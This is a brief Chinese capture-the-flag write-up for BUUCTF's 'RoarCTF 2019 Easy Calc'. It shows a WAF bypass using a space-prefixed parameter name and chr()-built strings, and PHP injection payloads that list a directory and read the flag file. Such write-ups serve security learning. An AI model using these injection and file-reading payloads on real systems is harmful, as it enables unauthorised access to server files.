Buuctf——[RoarCTF 2019]Easy Calc

 有waf，不能出现非数字参数值。使用%20num可以绕过waf（Abusing PHP query string parser to bypass IDS, IPS, and WAF (secjuice.com)）

过滤了单双引号，可以用chr()函数构造字符串

?%20num=var_dump(scandir(chr(46)))

 ?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))使用show_source函数查看文件得flag